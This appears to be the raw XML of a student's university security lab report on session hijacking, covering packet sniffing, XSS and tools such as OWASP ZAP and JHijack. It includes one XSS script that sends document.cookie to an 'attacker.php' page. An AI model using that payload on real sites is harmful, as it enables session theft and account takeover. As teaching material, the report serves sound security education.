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B503D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B26F89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7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tudent Name: Sahul Kumar Parida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>UID: 20BCS4919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Branch: CSE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9E50A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8/11</w:t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/2022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Name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2B2E" w:rsidRPr="00B503DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Web and</w:t>
      </w:r>
      <w:r w:rsidR="003C2B2E" w:rsidRPr="00B503D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Mobile</w:t>
      </w:r>
      <w:r w:rsidR="003C2B2E" w:rsidRPr="00B503D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Security</w:t>
      </w:r>
      <w:r w:rsidR="00D132B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab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Code: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 20CSP-333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468" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B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DB3468" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Implementation of Session hijacking attack on http-enabled website</w:t>
      </w:r>
      <w:r w:rsidR="00CA4B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4B5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A4B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB3468">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA4B5B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Pr="00CA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68" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA4B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Identify vulnerable session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Software/Hardware Requirement:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRPr="00CA4B5B" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRPr="00817726" w:rsidRDefault="00DB3468" w:rsidP="00DB34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726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>JHijack</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00817726">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - a numeric session hijacking tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRDefault="00DB3468" w:rsidP="00DB34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B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps/Method/Coding: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguise itself as one of the authenticated users. This type of attack is possible because authentication typically is only done at the start of a TCP session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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81772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A hacker attack on a user session is referred to as </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00817726">
          <w:rPr>
            <w:rStyle w:val="Strong"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000" w:themeColor="text1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session hijacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0081772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When we log into any service, the session is active. The ideal scenario is when we use a </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00817726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eb application</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0081772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such as a banking application, to conduct a financial transaction. Cookie Hijacking, also known as cookie side jacking, is another name for session hijacking. A hacker’s attack is more targeted the more detailed information they have about our sessions. For web applications and browser sessions, this session hijacking is typical.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="00DB34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Using Packet Sniffers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3468" w:rsidRDefault="00817726" w:rsidP="00DB34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839375" cy="305795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ssio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26" w:rsidRDefault="00817726" w:rsidP="00DB34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791744" cy="293410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ssio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26" w:rsidRP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In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Pr="00817726" w:rsidRDefault="00817726" w:rsidP="0081772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Pr="00817726" w:rsidRDefault="00817726" w:rsidP="00817726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Cross Site Scripting(XSS Attack)</w:t>
      </w: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br/>
        <w:t>Attacker can also capture victim’s Session ID using XSS attack by using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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</w:pPr>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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&lt;SCRIPT type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRP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  <w:r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val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6372225" cy="36026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okieAle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80" cy="36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Default="00817726" w:rsidP="00817726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Pr="00817726" w:rsidRDefault="00817726" w:rsidP="00817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Session Sniffing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="0081772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To obtain the valid session ID, the attacker employs a valid sniffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="00817726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Unauthorized access to the web server is gained by the hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRDefault="00817726" w:rsidP="008177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Default="00817726" w:rsidP="008177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Default="00817726" w:rsidP="008177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Pr="00817726" w:rsidRDefault="00817726" w:rsidP="008177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Default="00817726" w:rsidP="008177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</w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="008177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Attacks on the client side:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="00817726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A hacker can take over a session ID by utilizing harmful software or client-side code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="00817726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Cross-site scripting attacks to steal the session token are very common.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRDefault="00817726" w:rsidP="00817726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817726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Using malicious JavaScript code is possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00552AE8" w:rsidRDefault="00552AE8" w:rsidP="00552A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552AE8" w:rsidRPr="00817726" w:rsidRDefault="00552AE8" w:rsidP="00552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4B5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Output screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00817726" w:rsidRPr="00817726" w:rsidRDefault="00817726" w:rsidP="00DB34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353175" cy="3467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ssionfixationatt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500" cy="34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68" w:rsidRDefault="00DB3468" w:rsidP="00DB346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A5" w:rsidRDefault="00F226A5" w:rsidP="00DB346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A5" w:rsidRPr="00F226A5" w:rsidRDefault="00F226A5" w:rsidP="00F226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26A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Learning Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00485408" w:rsidRPr="00F226A5" w:rsidRDefault="00F226A5" w:rsidP="0048540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</w:t>
      </w:r>
      <w:r w:rsidRPr="00F226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ssion hijacking attack can be best defined as </w:t>
      </w:r>
      <w:r w:rsidRPr="00F226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 successful attempt of an attacker to take over your web session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F226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An attacker can impersonate an authorized user to gain access to a domain, server, website, web application, or network to which access is restricted through this type of attack.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00485408" w:rsidRPr="00F226A5" w:rsidSect="004D7FE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67" w:rsidRDefault="00316067">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00316067" w:rsidRDefault="0031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67" w:rsidRDefault="00316067">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00316067" w:rsidRDefault="0031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1A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D738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852E37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54F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02D7211"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D2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20BBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="321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F716DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D3A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424A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="492542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421D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E2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42B4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="657A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70FF3261"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E00A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3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="16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9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="19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14681F"/>
    <w:rsid w:val="001E0F8E"/>
    <w:rsid w:val="001E13C2"/>
    <w:rsid w:val="002243CE"/>
    <w:rsid w:val="002B1CCC"/>
    <w:rsid w:val="002B718C"/>
    <w:rsid w:val="002D4C61"/>
    <w:rsid w:val="002F16CE"/>
    <w:rsid w:val="00300AD2"/>
    <w:rsid w:val="00316067"/>
    <w:rsid w:val="00325829"/>
    <w:rsid w:val="003C2B2E"/>
    <w:rsid w:val="003D69C3"/>
    <w:rsid w:val="00485408"/>
    <w:rsid w:val="00495F14"/>
    <w:rsid w:val="004D7FEF"/>
    <w:rsid w:val="004F453A"/>
    <w:rsid w:val="00552AE8"/>
    <w:rsid w:val="00563B52"/>
    <w:rsid w:val="00596E62"/>
    <w:rsid w:val="00817726"/>
    <w:rsid w:val="00895C65"/>
    <w:rsid w:val="008A1A9E"/>
    <w:rsid w:val="008F7585"/>
    <w:rsid w:val="00950444"/>
    <w:rsid w:val="009C4027"/>
    <w:rsid w:val="009D0FE5"/>
    <w:rsid w:val="009E50A5"/>
    <w:rsid w:val="00A50A16"/>
    <w:rsid w:val="00A74C57"/>
    <w:rsid w:val="00A77671"/>
    <w:rsid w:val="00B26F89"/>
    <w:rsid w:val="00B503DF"/>
    <w:rsid w:val="00BF3FE7"/>
    <w:rsid w:val="00C24367"/>
    <w:rsid w:val="00C83074"/>
    <w:rsid w:val="00CA4B5B"/>
    <w:rsid w:val="00D132B4"/>
    <w:rsid w:val="00D65E9B"/>
    <w:rsid w:val="00DB3468"/>
    <w:rsid w:val="00E3246D"/>
    <w:rsid w:val="00E977F7"/>
    <w:rsid w:val="00EB76DE"/>
    <w:rsid w:val="00F226A5"/>
    <w:rsid w:val="00F50DD9"/>
    <w:rsid w:val="00FA74C5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68"/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ession-hijackin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ow-to-design-a-web-application-a-guideline-on-software-architectur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B6E4-012F-4B96-A442-AEFA27E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7</cp:revision>
  <cp:lastPrinted>2022-11-08T13:58:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-14T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-1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